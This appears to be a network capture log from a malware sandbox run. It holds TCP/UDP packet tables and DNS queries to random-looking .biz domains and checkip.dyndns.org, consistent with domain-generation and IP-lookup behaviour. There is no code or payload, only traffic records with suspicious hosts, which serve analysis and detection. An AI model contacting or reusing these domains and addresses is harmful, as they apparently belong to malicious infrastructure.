Dec 31, 2024 09:06:09.000380039 CET	80	49816	18.141.10.107	192.168.2.4
Dec 31, 2024 09:06:09.000498056 CET	80	49816	18.141.10.107	192.168.2.4
Dec 31, 2024 09:06:09.000533104 CET	49816	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:06:09.000614882 CET	49816	80	192.168.2.4	18.141.10.107
Dec 31, 2024 09:06:09.005378008 CET	80	49816	18.141.10.107	192.168.2.4
Dec 31, 2024 09:06:09.138058901 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:09.138293028 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:09.143135071 CET	80	49746	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:09.143148899 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:09.143196106 CET	49746	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:09.143225908 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:09.143364906 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:09.143390894 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:09.148173094 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:09.148183107 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:09.671380043 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:09.788249969 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:09.795670033 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:09.796890974 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:09.797213078 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:09.802782059 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:09.858335972 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:10.276500940 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:10.276513100 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:10.276559114 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:10.410396099 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:10.410396099 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:10.415237904 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:10.415251017 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:10.556740999 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:10.557439089 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:10.562232018 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:10.663001060 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:10.663018942 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:10.663074017 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:10.748964071 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:10.841712952 CET	49840	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:10.846610069 CET	80	49840	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:10.846677065 CET	49840	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:10.846945047 CET	49840	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:10.846945047 CET	49840	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:10.851828098 CET	80	49840	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:10.851840973 CET	80	49840	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:10.889987946 CET	49840	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:11.033562899 CET	49841	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:11.038382053 CET	80	49841	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:11.038474083 CET	49841	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:11.038718939 CET	49841	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:11.038765907 CET	49841	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:11.043533087 CET	80	49841	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:11.043544054 CET	80	49841	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:11.786493063 CET	80	49841	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:11.786567926 CET	80	49841	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:11.786622047 CET	49841	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:11.789519072 CET	49841	80	192.168.2.4	34.246.200.160
Dec 31, 2024 09:06:11.794660091 CET	80	49841	34.246.200.160	192.168.2.4
Dec 31, 2024 09:06:11.878324032 CET	49847	80	192.168.2.4	34.227.7.138
Dec 31, 2024 09:06:11.883126974 CET	80	49847	34.227.7.138	192.168.2.4
Dec 31, 2024 09:06:11.883205891 CET	49847	80	192.168.2.4	34.227.7.138
Dec 31, 2024 09:06:11.883486986 CET	49847	80	192.168.2.4	34.227.7.138
Dec 31, 2024 09:06:11.883498907 CET	49847	80	192.168.2.4	34.227.7.138
Dec 31, 2024 09:06:11.888257980 CET	80	49847	34.227.7.138	192.168.2.4
Dec 31, 2024 09:06:11.888268948 CET	80	49847	34.227.7.138	192.168.2.4
Dec 31, 2024 09:06:12.339238882 CET	80	49847	34.227.7.138	192.168.2.4
Dec 31, 2024 09:06:12.339374065 CET	49847	80	192.168.2.4	34.227.7.138
Dec 31, 2024 09:06:12.339406013 CET	80	49847	34.227.7.138	192.168.2.4
Dec 31, 2024 09:06:12.339657068 CET	49847	80	192.168.2.4	34.227.7.138
Dec 31, 2024 09:06:12.344238043 CET	80	49847	34.227.7.138	192.168.2.4
Dec 31, 2024 09:06:12.518874884 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:12.523679018 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:12.523734093 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:12.524959087 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:12.524979115 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:12.530139923 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:12.530153036 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:13.006155968 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:13.077657938 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:13.077694893 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:13.082531929 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:13.082544088 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:13.193420887 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:13.358396053 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:13.452743053 CET	49859	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:13.457570076 CET	80	49859	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:13.457634926 CET	49859	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:13.457752943 CET	49859	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:13.457767963 CET	49859	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:13.462589979 CET	80	49859	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:13.462604046 CET	80	49859	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:14.906455994 CET	80	49859	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:14.906757116 CET	80	49859	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:14.906825066 CET	49859	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:14.917974949 CET	49859	80	192.168.2.4	13.251.16.150
Dec 31, 2024 09:06:14.922804117 CET	80	49859	13.251.16.150	192.168.2.4
Dec 31, 2024 09:06:15.142847061 CET	49871	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:15.147665024 CET	80	49871	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:15.147722006 CET	49871	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:15.147855997 CET	49871	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:15.147881985 CET	49871	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:15.152679920 CET	80	49871	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:15.152690887 CET	80	49871	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:15.611007929 CET	80	49871	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:15.611088991 CET	80	49871	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:15.611140966 CET	49871	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:15.611234903 CET	49871	80	192.168.2.4	44.221.84.105
Dec 31, 2024 09:06:15.617336035 CET	80	49871	44.221.84.105	192.168.2.4
Dec 31, 2024 09:06:15.872549057 CET	49876	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:15.877299070 CET	80	49876	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:15.877368927 CET	49876	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:15.879801989 CET	49876	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:15.879898071 CET	49876	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:15.884533882 CET	80	49876	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:15.884650946 CET	80	49876	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:16.579987049 CET	80	49876	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:16.580111027 CET	80	49876	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:16.580163956 CET	49876	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:16.588903904 CET	49876	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:16.593667984 CET	80	49876	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:16.773511887 CET	49883	80	192.168.2.4	35.164.78.200
Dec 31, 2024 09:06:16.778351068 CET	80	49883	35.164.78.200	192.168.2.4
Dec 31, 2024 09:06:16.778681993 CET	49883	80	192.168.2.4	35.164.78.200
Dec 31, 2024 09:06:16.779573917 CET	49883	80	192.168.2.4	35.164.78.200
Dec 31, 2024 09:06:16.779587030 CET	49883	80	192.168.2.4	35.164.78.200
Dec 31, 2024 09:06:16.784394026 CET	80	49883	35.164.78.200	192.168.2.4
Dec 31, 2024 09:06:16.784404993 CET	80	49883	35.164.78.200	192.168.2.4
Dec 31, 2024 09:06:17.510077953 CET	80	49883	35.164.78.200	192.168.2.4
Dec 31, 2024 09:06:17.510193110 CET	80	49883	35.164.78.200	192.168.2.4
Dec 31, 2024 09:06:17.510848999 CET	49883	80	192.168.2.4	35.164.78.200
Dec 31, 2024 09:06:17.569150925 CET	49883	80	192.168.2.4	35.164.78.200
Dec 31, 2024 09:06:17.574513912 CET	80	49883	35.164.78.200	192.168.2.4
Dec 31, 2024 09:06:17.911372900 CET	49891	80	192.168.2.4	3.94.10.34
Dec 31, 2024 09:06:17.916096926 CET	80	49891	3.94.10.34	192.168.2.4
Dec 31, 2024 09:06:17.916898012 CET	49891	80	192.168.2.4	3.94.10.34
Dec 31, 2024 09:06:17.916960955 CET	49891	80	192.168.2.4	3.94.10.34
Dec 31, 2024 09:06:17.916976929 CET	49891	80	192.168.2.4	3.94.10.34
Dec 31, 2024 09:06:17.921694994 CET	80	49891	3.94.10.34	192.168.2.4
Dec 31, 2024 09:06:17.921704054 CET	80	49891	3.94.10.34	192.168.2.4
Dec 31, 2024 09:06:18.390219927 CET	80	49891	3.94.10.34	192.168.2.4
Dec 31, 2024 09:06:18.390333891 CET	80	49891	3.94.10.34	192.168.2.4
Dec 31, 2024 09:06:18.390419006 CET	49891	80	192.168.2.4	3.94.10.34
Dec 31, 2024 09:06:18.391444921 CET	49891	80	192.168.2.4	3.94.10.34
Dec 31, 2024 09:06:18.396183968 CET	80	49891	3.94.10.34	192.168.2.4
Dec 31, 2024 09:06:18.625432968 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:18.630242109 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:18.630301952 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:18.630624056 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:18.630673885 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:18.635370016 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:18.635485888 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:19.381952047 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:19.425441980 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:19.425476074 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:19.430294991 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:19.430306911 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:19.607393026 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:19.686490059 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:20.662735939 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:20.664279938 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:20.694036961 CET	49831	80	192.168.2.4	199.59.243.227
Dec 31, 2024 09:06:20.698791027 CET	80	49831	199.59.243.227	192.168.2.4
Dec 31, 2024 09:06:20.838433981 CET	49910	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:20.843272924 CET	80	49910	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:20.843358994 CET	49910	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:20.843485117 CET	49910	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:20.843498945 CET	49910	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:20.848248005 CET	80	49910	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:20.848257065 CET	80	49910	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:21.574311972 CET	80	49910	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:21.574368954 CET	80	49910	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:21.574455023 CET	49910	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:21.575946093 CET	49910	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:21.580801010 CET	80	49910	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:21.959875107 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:21.960170984 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:21.964943886 CET	80	49853	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:21.965004921 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:21.965015888 CET	49853	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:21.965069056 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:21.965406895 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:21.965450048 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:21.970223904 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:21.970235109 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:22.477936029 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:22.525209904 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:22.525211096 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:22.530132055 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:22.530157089 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:22.644244909 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:22.751463890 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:23.808870077 CET	49927	80	192.168.2.4	18.246.231.120
Dec 31, 2024 09:06:23.813714981 CET	80	49927	18.246.231.120	192.168.2.4
Dec 31, 2024 09:06:23.813909054 CET	49927	80	192.168.2.4	18.246.231.120
Dec 31, 2024 09:06:23.814193964 CET	49927	80	192.168.2.4	18.246.231.120
Dec 31, 2024 09:06:23.814219952 CET	49927	80	192.168.2.4	18.246.231.120
Dec 31, 2024 09:06:23.818944931 CET	80	49927	18.246.231.120	192.168.2.4
Dec 31, 2024 09:06:23.818954945 CET	80	49927	18.246.231.120	192.168.2.4
Dec 31, 2024 09:06:24.525293112 CET	80	49927	18.246.231.120	192.168.2.4
Dec 31, 2024 09:06:24.525434971 CET	80	49927	18.246.231.120	192.168.2.4
Dec 31, 2024 09:06:24.525480986 CET	49927	80	192.168.2.4	18.246.231.120
Dec 31, 2024 09:06:24.543677092 CET	49927	80	192.168.2.4	18.246.231.120
Dec 31, 2024 09:06:24.548434019 CET	80	49927	18.246.231.120	192.168.2.4
Dec 31, 2024 09:06:25.100718975 CET	49938	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:25.105559111 CET	80	49938	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:25.105655909 CET	49938	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:25.105933905 CET	49938	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:25.106216908 CET	49938	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:25.110734940 CET	80	49938	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:25.110982895 CET	80	49938	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:25.746792078 CET	80	49741	132.226.8.169	192.168.2.4
Dec 31, 2024 09:06:25.746845961 CET	49741	80	192.168.2.4	132.226.8.169
Dec 31, 2024 09:06:51.130354881 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:51.130405903 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:51.131359100 CET	49895	80	192.168.2.4	165.160.13.20
Dec 31, 2024 09:06:51.136054993 CET	80	49895	165.160.13.20	192.168.2.4
Dec 31, 2024 09:06:53.680003881 CET	80	49938	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:53.680062056 CET	49938	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:53.686476946 CET	49938	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:53.688967943 CET	50050	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:53.691869974 CET	80	49938	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:53.694236994 CET	80	50050	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:53.694310904 CET	50050	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:53.694452047 CET	50050	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:53.694477081 CET	50050	80	192.168.2.4	54.244.188.177
Dec 31, 2024 09:06:53.699255943 CET	80	50050	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:53.699269056 CET	80	50050	54.244.188.177	192.168.2.4
Dec 31, 2024 09:06:57.221101046 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:57.221174002 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:06:57.221174002 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:06:57.226284027 CET	80	49827	72.52.178.23	192.168.2.4
Dec 31, 2024 09:06:57.226356983 CET	49827	80	192.168.2.4	72.52.178.23
Dec 31, 2024 09:06:57.226630926 CET	80	49748	13.248.148.254	192.168.2.4
Dec 31, 2024 09:06:57.226660013 CET	80	49916	208.117.43.225	192.168.2.4
Dec 31, 2024 09:06:57.226697922 CET	49748	80	192.168.2.4	13.248.148.254
Dec 31, 2024 09:06:57.226753950 CET	49916	80	192.168.2.4	208.117.43.225
Dec 31, 2024 09:07:00.765197039 CET	49741	80	192.168.2.4	132.226.8.169
Dec 31, 2024 09:07:00.770078897 CET	80	49741	132.226.8.169	192.168.2.4
Dec 31, 2024 09:07:15.111534119 CET	80	50050	54.244.188.177	192.168.2.4
Dec 31, 2024 09:07:15.112529039 CET	50050	80	192.168.2.4	54.244.188.177

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:05:06.261581898 CET	61174	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:06.269162893 CET	53	61174	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:06.619533062 CET	60000	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:06.627377987 CET	53	60000	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:07.688419104 CET	58237	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:07.695111990 CET	53	58237	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:08.009258032 CET	59381	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:08.016556978 CET	53	59381	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:09.794758081 CET	60420	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:09.802153111 CET	53	60420	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:10.811642885 CET	58050	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:10.818840027 CET	53	58050	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:11.347551107 CET	57418	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:11.354835987 CET	53	57418	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:12.391901970 CET	65347	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:12.399024010 CET	53	65347	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:13.097170115 CET	59328	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:13.106596947 CET	53	59328	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:14.015062094 CET	63219	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:14.022413969 CET	53	63219	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:14.023228884 CET	63397	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:14.030936003 CET	53	63397	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:15.571506977 CET	54659	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:15.578566074 CET	53	54659	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:15.579080105 CET	56726	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:15.586034060 CET	53	56726	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:15.603377104 CET	50175	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:15.610614061 CET	53	50175	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:20.881325006 CET	60497	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:20.888358116 CET	53	60497	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:26.001919985 CET	57886	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:26.009372950 CET	53	57886	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:26.973227024 CET	54367	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:27.155514956 CET	53	54367	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:28.681422949 CET	50258	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:28.688427925 CET	53	50258	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:29.436032057 CET	53567	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:29.442986012 CET	53	53567	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:29.912750006 CET	51179	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:29.920113087 CET	53	51179	1.1.1.1	192.168.2.4
Dec 31, 2024 09:05:38.908292055 CET	55150	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:05:38.915432930 CET	53	55150	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:02.967417002 CET	62848	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:02.975606918 CET	53	62848	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:04.888767958 CET	63147	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:04.895874977 CET	53	63147	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:06.503551960 CET	58219	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:06.511674881 CET	53	58219	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:07.519160986 CET	54174	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:07.526576996 CET	53	54174	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:09.024770975 CET	62960	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:09.032285929 CET	53	62960	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:09.766015053 CET	54760	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:09.773904085 CET	53	54760	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:10.770970106 CET	59973	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:10.778565884 CET	53	59973	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:11.805351973 CET	49945	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:11.812114954 CET	53	49945	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:12.361407042 CET	63665	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:12.368541956 CET	53	63665	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:13.219654083 CET	56744	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:13.226696014 CET	53	56744	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:14.941992044 CET	51440	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:14.948916912 CET	53	51440	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:15.635586977 CET	57315	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:15.642781019 CET	53	57315	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:16.637470007 CET	55001	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:16.644560099 CET	53	55001	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:17.639342070 CET	57273	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:17.647010088 CET	53	57273	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:18.411299944 CET	52032	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:18.417994976 CET	53	52032	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:19.647521973 CET	64818	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:19.654567957 CET	53	64818	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:21.600910902 CET	51518	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:21.608053923 CET	53	51518	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:22.669192076 CET	50365	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:22.677326918 CET	53	50365	1.1.1.1	192.168.2.4
Dec 31, 2024 09:06:24.605668068 CET	56463	53	192.168.2.4	1.1.1.1
Dec 31, 2024 09:06:24.785345078 CET	53	56463	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 09:05:06.261581898 CET	192.168.2.4	1.1.1.1	0x9df8	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:06.619533062 CET	192.168.2.4	1.1.1.1	0x8ce6	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:07.688419104 CET	192.168.2.4	1.1.1.1	0x1c54	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:08.009258032 CET	192.168.2.4	1.1.1.1	0xff64	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:09.794758081 CET	192.168.2.4	1.1.1.1	0xa828	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:10.811642885 CET	192.168.2.4	1.1.1.1	0xceda	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:11.347551107 CET	192.168.2.4	1.1.1.1	0xfa0a	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:12.391901970 CET	192.168.2.4	1.1.1.1	0x26f5	Standard query (0)	ww7.przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:13.097170115 CET	192.168.2.4	1.1.1.1	0x7f08	Standard query (0)	ww12.przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:14.015062094 CET	192.168.2.4	1.1.1.1	0xbff6	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:14.023228884 CET	192.168.2.4	1.1.1.1	0x36cf	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
